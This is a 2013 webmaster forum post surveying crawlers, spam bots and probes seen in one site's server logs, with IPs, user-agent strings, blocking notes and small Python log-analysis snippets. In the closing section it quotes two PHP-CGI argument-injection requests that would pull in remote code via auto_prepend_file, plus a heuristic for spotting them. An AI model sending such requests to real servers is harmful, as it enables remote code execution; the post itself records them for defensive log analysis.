lucy24 - 8:08 pm on Feb 11, 2013 (gmt 0)


At Home with the Robots: 2013 edition, Part Two

Given a choice between bisecting a post and trimming it...

The Bad...

New This Year
The robots themselves aren't new, only their position. These are the ones I reclassified from "No skin off my nose" to "Get thee hence!" after last year's closer look.

The plainclothes MSIE-bot
IP: 131.253, 65.52, 65.55
UA: begins with Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1 or 5.2 and then varies at random
robots.txt? What on earth for? I'm just a human who works for Microsoft and therefore naturally uses MSIE 7. Last year, most visits followed a pattern: one random html file, followed by any one non-image subsidiary file like css or js. This year it's nothing but .html files. Maybe it's because they're denied access to that initial page, so they don't know what to ask for next.
Someone hereabouts said that the plainclothes MSIEbot isn't a robot at all; it works for Bing Translate. Personal experiment doesn't support this interpretation, though.
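
For anyone who wants to pick these visits out of a log, here is a minimal sketch of the two-part test described above: one of the three listed IP prefixes plus a UA that starts with the MSIE 7.0 / Windows NT 5.1 or 5.2 string. The function name is made up for illustration, and the prefixes are only the ones listed in this post, not an authoritative range.

```python
# Prefixes copied from the listing above; trailing dots avoid matching e.g. 65.520.x.x.
MSIE_BOT_IP_PREFIXES = ("131.253.", "65.52.", "65.55.")
MSIE_BOT_UA_PREFIXES = (
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2",
)


def looks_like_plainclothes_msie(ip: str, user_agent: str) -> bool:
    """Hypothetical helper: True only when BOTH the IP and the UA prefix match."""
    # str.startswith accepts a tuple and returns True if any prefix matches.
    return ip.startswith(MSIE_BOT_IP_PREFIXES) and user_agent.startswith(
        MSIE_BOT_UA_PREFIXES
    )
```

Requiring both conditions keeps real MSIE 7 users on other networks, and other Microsoft traffic from the same ranges, out of the net.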

Ezooms
IP: 208.115.111.72, ..113.88 (this year, as last year, it's only these exact two)
UA: Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Distinguishing feature: UA that includes a gmail address. I originally blocked them because they share an IP with the not-so-nice dotbot. The dotbot hasn't been around in a while, and ezooms seems to obey robots.txt, so I was thinking of unblocking them. After some cursory research I dropped the idea. Among other things, they claim their connection is through "dotnetdotcom.org" which kinda suggests that it's all the same robot anyway. And I don't think anyone has ever figured out what they do.

YahooCacheSystem
IP: 98.139.241.24n
UA: YahooCacheSystem
I haven't seen these folks since November. But robots sometimes take long breaks, so I mention them here.

Yahoo! Slurp
IP: 72.30, 98.137
UA: Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp) NOT Firefox/3.5
Got that? NOT Firefox 3.5, so don't go treating us as if we were Firefox 3.5, meaning ... uh ... don't lock them out? (Even Camino, whose UA string is a little iffy, says emphatically "like Firefox 3.6". Clearly something must have happened in that 1/10 of a step.) Distinguishing feature: All requests-- blocked, of course-- are followed by the 403 page's style sheet. But by weird coincidence they only ask for the favicon when the original request was for the front page. Hmmm.

This year we also have a
Yahoo! Slurp China
IP: 110.75.173-176
The name says it all. In linguist-speak, this is called Double Markedness.

mail.ru
I've gone back and forth on these guys. Somewhere in the background is a legitimate Russian ISP. Latest discovery: As with bing/msn, there are two entirely different entities. I've provisionally unblocked the robot only. So far they don't seem to have noticed.

Robot:
IP: 217.69.133.68, ..134.56
UA: Mozilla/5.0 (compatible; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)
The robot behaves perfectly well. Asks for and obeys robots.txt, no matter how often it gets the door slammed in its face.

Images:
IP: 217.69.135.91
UA: Mozilla/5.0 (compatible; Mail.RU/2.0c)
and
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0
This one gets us into profiler territory. Every visit follows the same pattern:
GET {some image from /games/ directory} with blank referer, using first UA
GET {exactly the same thing}
GET {same image file} with referer http://go.mail.ru/search_images, using second UA

Repeat with four more /games/images/ files, for a total of 15 requests at intervals of 1-2 seconds. They do this about twice a month on average. Past experience with a similar pattern suggests they may respond to the 127.0.0.1 redirect; I'll try it one day. A final quirk is this:
217.69.135.91 - - [07/Feb/2013:09:08:08 -0800] "GET http://www.example.com/games/images/SquatterPic.jpg HTTP/1.1" 403 1495 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0c)"
All requests come through like that in logs. File under: Yet another thing that someone once explained to me but I've forgotten the explanation.
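
What stands out in that log line is that the request carries a full URL rather than a bare path. HTTP/1.1 does allow that form (it is the one normally sent to proxies), though I won't claim that explains why this visitor uses it. A rough sketch for spotting such lines, assuming the usual Apache "combined" log layout; the regex and function names are my own, not anything standard:

```python
import re

# Assumed layout: Apache "combined" log format, as in the sample line above.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the named fields as a dict, or None if the line doesn't fit."""
    match = LOG_LINE.match(line)
    return match.groupdict() if match else None


def is_absolute_form(target):
    """True when the request target is a full URL instead of a path."""
    return target.lower().startswith(("http://", "https://"))


sample = (
    '217.69.135.91 - - [07/Feb/2013:09:08:08 -0800] '
    '"GET http://www.example.com/games/images/SquatterPic.jpg HTTP/1.1" '
    '403 1495 "-" "Mozilla/5.0 (compatible; Mail.RU/2.0c)"'
)
fields = parse_line(sample)
print(fields["ip"], fields["status"], is_absolute_form(fields["target"]))
```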


Same old same old

Baidu (China):
IP: 123.125; 180.76; 220.181
UAs: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) the same as Baidu-Japan
Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDR; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; Tablet PC 2.0)

Baidu has been getting clumsy: there's a fair number of requests for broken URLs like "/fonts/naamaj" or "/hovercraft/n". Looking back, I see it was already doing this a year ago. Well, if you're going to get the door slammed in your face regardless, why bother to get the name right?

Soso:
IP: 124.115.6.13
UA: Mozilla/5.0(compatible; Sosospider/2.0; +http://help.soso.com/webspider.htm) note missing space
How are the mighty fallen! Couple of years back, Soso was one of the ickier spiders around. Then, starting around September 2011, it was only allowed to give its name when asking for robots.txt-- the robotic equivalent of working traffic on Staten Island. The rest of the time it came in with a generic MSIE UA. Even this got squashed partway through January 2012, though I didn't realize it at the time. Since then, all the SosoSpider has done is ask for robots.txt. And it can't even get this right. It asks for robots.txt with the wrong form of the domain name, gets redirected, and never bothers to come back and ask again with the correct name. Once a day, every day.

JikeSpider:
IP: 1.202.218.71
UAs: Mozilla/5.0 () and that's all
Mozilla/5.0 (compatible; JikeSpider; +http://shoulu.jike.com/spider.html)
I don't know if this one is on its way in or on its way out. Since it operates from China, it will be blocked regardless.

There are assorted other Chinese robots-- some of whom try to disguise themselves by claiming Russian as their first language-- but they're all much of a muchness.

The Ukrainians
IP: 46.118.118, 92.249.127, 94.153.65.92, 176.8.91.143, 178.137.162.140, 193.106.136, 195.242.218, 213.110.133.221
UA: random
Like the man said: The Ukrainians you will always have with you. But oh! what a pang of nostalgia it gave me to find them still at it. Their favorite page is still lions.html, with occasional forays into duct_tape, Rambles and-- late in the month-- mice.html (a gallery page and therefore pointless without its illustrations, as is lions). They always make two consecutive requests, always with a fake referer and an improbable UA like
Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)
or
Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)
What do they want? Who knows? Who cares? Maybe it's just referer spam. Most are from .ru domains so they would be blocked even if I didn't already know the IP. The double request is new since last year; they used to come in threes. I'm not complaining.
Note that 176.9 is Hetzner, so 176.8.0.0/15 can be conveniently blocked in one go.
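
If the CIDR arithmetic isn't obvious: a /15 covers two adjacent second-octet values, so 176.8.0.0/15 runs from 176.8.0.0 through 176.9.255.255. A quick check with Python's standard ipaddress module (the helper name is just for illustration):

```python
import ipaddress

# The block mentioned above: covers both 176.8.x.x and 176.9.x.x.
BLOCK = ipaddress.ip_network("176.8.0.0/15")


def in_block(ip: str) -> bool:
    """Hypothetical helper: is this address inside 176.8.0.0/15?"""
    return ipaddress.ip_address(ip) in BLOCK


print(BLOCK[0], "-", BLOCK[-1])   # first and last address in the block
print(in_block("176.8.91.143"))   # one of the Ukrainian IPs listed above
print(in_block("176.10.0.1"))     # just outside the block
```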

The Russians
IP: 37.139.52.23, 91.223.75, 91.237.249, 95.24.182.19, 176.195
UA: various
Exactly the same as the Ukrainians except that, uh, they're from Russia ;) The set at 91.223.75 (that's 91, so you really are stuck at the /24 level) is a new addition to the block list. They'd always given .ru referers so I never noticed that the IP itself was open, until they came waltzing in with a .com: Oi! How did you get in here?

ahrefsbot
IP: 173.199.114-120
User-Agent: Mozilla/5.0 (compatible; AhrefsBot/2.0; +http://ahrefs.com/robot/)
A year ago:
I have no idea what, if anything, they're about. I just know that they seem to think robots.txt is non-perishable: about once a month they pick up three copies in a batch, and then carry on regardless. Don't know whether they even read it; they don't dig deeply enough for me to be sure.

They've now gone over to a single weekly pickup of robots.txt. And, hm, they seem to be operating from an entirely new IP. They're blocked by UA, so I never noticed.

facebookexternalhit
IP: 66.220.144-159; 69.171.224-255; 173.252.64-127
UAs:
facebookexternalhit/1.0 (+http://www.facebook.com/externalhit_uatext.php)
facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)
The 1.0 UA is apparently brought out to switch-hit when 1.1 gets tired, or anticipates getting tired. When there's a long string of requests for the same file, they go by pairs: 1.1, followed within one second by 1.0.
I have yet to see one iota of evidence that facebookexternalwhatsit can benefit me in any way whatsoever. But I made one change: There's no reason to block HEAD requests, since they're simply confirming that a given image file exists. (I've never prevented them from looking at pages; they show up in logs as 206.)
The 173.252 range is a new one on me; looking back, I first find them in November.
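
The IP lines in this post use a shorthand like 66.220.144-159, meaning a run of third-octet values. If your blocking tool wants CIDR instead, the conversion can be sketched with the standard ipaddress module. The function name is invented for this example, and it assumes the shorthand always means whole /24s from the low value through the high one.

```python
import ipaddress


def third_octet_range_to_cidrs(prefix, low, high):
    """Turn e.g. ("66.220", 144, 159) into the smallest list of CIDR blocks.

    Assumes the shorthand covers prefix.low.0 through prefix.high.255.
    """
    first = ipaddress.IPv4Address(f"{prefix}.{low}.0")
    last = ipaddress.IPv4Address(f"{prefix}.{high}.255")
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]


for prefix, low, high in [("66.220", 144, 159), ("69.171", 224, 255), ("173.252", 64, 127)]:
    print(prefix, low, high, third_octet_range_to_cidrs(prefix, low, high))
```

Each of the three facebook ranges happens to line up on a power-of-two boundary, so each collapses to a single block. A range that doesn't line up comes back as several smaller blocks.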

Trendmicro
IP: 150.70 (last year I also met them at 216.104.15)
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Some folks don't mind them. I say I don't like their face. I especially don't care for them requesting piwik files-- accompanied by the same query string that their preceding human just used.

websense
IP: 208.80.194 (full range .192-.199, but .194 is all I see)
User-Agent: varies
Much less active than last year at this time. Whew. Last year I was especially riled about their sister IP, 208.87.232-239, which attacked my sister site, the art studio. I have since learned that the reason they put on such a good impersonation of a human is that they were human. Oops. Under the name SurfControl, this IP is used as a proxy by our county government offices. You might think this serves people right for browsing the web on office machines during work hours, but the studio has a quasi-official status so you have to let them in.

... and similarly
TalkTalk
IP: 62.24
Somewhere at the back of this group is a normal ISP. It's got parental-control functions and anti-virus functions and who knows what else. Anyway, they annoy me.

NOC (for want of a better label)
IP: 184.22.183.114 and ..211.146
UA: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0
Last year at this time they gave their address as ..182.90 and ..46.14 with the same UA. I didn't especially notice them at the time; there were a few visits in the Miscellaneous bin. I have no idea what they're looking for, but people using FF 6 are generally up to no good. Random skipping through mid-year logs finds them using an even more unlikely "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)". Regardless of exact name and address, they keep asking for the same handful of pages over and over, in particular the trio
/games/
/games
/games/index.html

which are all, of course, the same file. If they weren't blocked (184.22 complete), two of the three would get redirected.
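
To count that trio as one page when tallying logs, the three spellings can be folded into a single form. This is only a sketch: it assumes the directory URL with a trailing slash is the canonical one, and that a last path segment without a dot is a directory. Neither assumption is spelled out above.

```python
def canonical_path(path: str) -> str:
    """Hypothetical normalizer: fold index.html and slashless directory
    requests into the trailing-slash form."""
    if path.endswith("/index.html"):
        # Keep the trailing slash, drop the file name.
        path = path[: -len("index.html")]
    last_segment = path.rsplit("/", 1)[-1]
    if last_segment and "." not in last_segment:
        # No extension: treat it as a directory (an assumption).
        path += "/"
    return path


for requested in ("/games/", "/games", "/games/index.html"):
    print(requested, "->", canonical_path(requested))
```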

auto-referers
Still around, and I still haven't found a universal way to block them. Identify after the fact, yes. Make a RewriteRule to send them into oblivion, no. Requests for some of the largest files are individually coded in htaccess; that's about all I can do.


Two for the Profilers

Some robots are distinguished by behavior patterns rather than UA or IP. For the past few months I've been particularly vexed by

the index.php botnet
IP: various
UA: various
That's my personal name for them, faute de mieux. Botnets don't have official names, do they?
Pattern: Always four requests, in this order:
#1 any random interior page, usually with auto-referer, sometimes a spam-type referer
#2 /fonts/ with either auto-referer or my front page as referer
#3 /fonts/index.php with /index.php as referer
#4 my front page, again with /index.php as referer.
I've picked out a few recurring IPs for blocking, but in general there's not a ### thing I can do. They're not clearly identifiable until the third request-- and that one's blocked anyway because of the .php extension. I could block the mydomain/index.php referer, but that's about it.
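
Identifying them after the fact is at least mechanical. Below is a rough sketch that scans one visitor's requests, in order, for the four-step pattern listed above. It assumes you've already grouped log entries by IP into (path, referer) pairs; the function name and the input shape are mine. The first request can be any page, so only steps 2 to 4 are tested.

```python
from urllib.parse import urlsplit


def referer_path(referer: str) -> str:
    """Path part of a referer URL ('' for a blank or '-' referer)."""
    return urlsplit(referer).path if referer not in ("", "-") else ""


def find_index_php_pattern(requests):
    """requests: list of (path, referer) tuples from one client, oldest first.

    Returns the index where the four-request pattern starts, or -1.
    """
    for i in range(len(requests) - 3):
        _first, second, third, fourth = requests[i:i + 4]
        if (
            second[0] == "/fonts/"
            and third[0] == "/fonts/index.php"
            and referer_path(third[1]) == "/index.php"
            and fourth[0] == "/"
            and referer_path(fourth[1]) == "/index.php"
        ):
            return i
    return -1
```

As noted, this only fires once the third request has arrived, so it is good for picking out IPs to block later rather than for stopping the visit in progress.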

ukiuq.html
IP: various, all of them already blocked
UA: various, from quasi-human to blatantly robotic
Ukiuq (not its real name) is a UCAS legacy font so obscure that-- well-- it's so obscure that when I last searched for its real name, my page popped up in first place. That's obscure.
Pattern: Four requests, in this order:
#1 /fonts/ukiuq.html, with either auto-referer or outside spam referer
#2 my front page, with /fonts/ukiuq.html as referer
#3 my front page, with auto-referer
#4 same again


Gone and Soon Forgotten

A handful of robots that were highly visible last year don't seem to be around any more. Unless they simply took the month off. Shrug.

oBot
Gigabot
orangeask


And The Ugly

These are the unambiguous ones: the robots that stroll in and ask for "login.php" and files with "myadmin" in the name, or try to PUT and POST. There is apparently a finite number of likely robotic IPs, because I didn't get any completely new ones this time around. Most memorable:

GET /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://example.net/nophp/test.php

and similarly

POST /?-n+-d+allow_url_include%3D1+-d+auto_prepend_file%3Dphp%3a%2f%2finput
... sent to the wrong domain name, so it was met with a 301 that magically changed the attempted POST into a GET. (Just recently I read an explanation of how and why this happens, but-- stop me if you've heard this one-- I don't remember the details.)
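
Both of these look like the PHP-CGI argument-injection probe that made the rounds in 2012 (CVE-2012-1823): a query string with no literal "=" that starts with a dash, so a vulnerable CGI setup would read it as command-line switches. A minimal sketch for decoding and flagging such queries; the function names are made up, and the test is deliberately crude:

```python
from urllib.parse import unquote_plus


def decode_query(raw_query: str) -> str:
    """Show what the query would look like as command-line text."""
    return unquote_plus(raw_query)


def looks_like_cgi_switch_injection(raw_query: str) -> bool:
    """Crude heuristic: starts with '-' and contains no unencoded '='."""
    return raw_query.startswith("-") and "=" not in raw_query


probe = "-n+-d+allow_url_include%3D1+-d+auto_prepend_file%3Dphp%3a%2f%2finput"
print(looks_like_cgi_switch_injection(probe))
print(decode_query(probe))
```

An ordinary query like "page=2" fails the test because of its "=" sign, which is the whole point of the percent-encoding in the probes.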


One-Offs

There weren't nearly as many of these as last year. Mainly:

Robot from UnityMedia
IP: 5.146.82.156
UA: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
60 requests, all 206, 301 or 404. Here's the odd thing: I have no record of ever seeing this IP before. But it must have been here at some time in the distant past, because it came in with a shopping list of files that ceased to exist up to two years ago. Hence the slew of 301s and 404s. The files that did exist were all old ones. But it wasn't programmed to deal with 301s, so it kept picking up the same redirects again and again without ever proceeding to the requested file.

AmazonAWS
IP: 184.72.175.146
UA: Java/1.6.0_24
33 consecutive requests for the same long page. Public-domain content, and the requests were generally a minute or more apart, so it's just the weirdness of the thing. How do they even find this stuff in the first place? What do they do with it?


Thread source: http://www.webmasterworld.com/search_engine_spiders/4544452.htm
Brought to you by WebmasterWorld: http://www.webmasterworld.com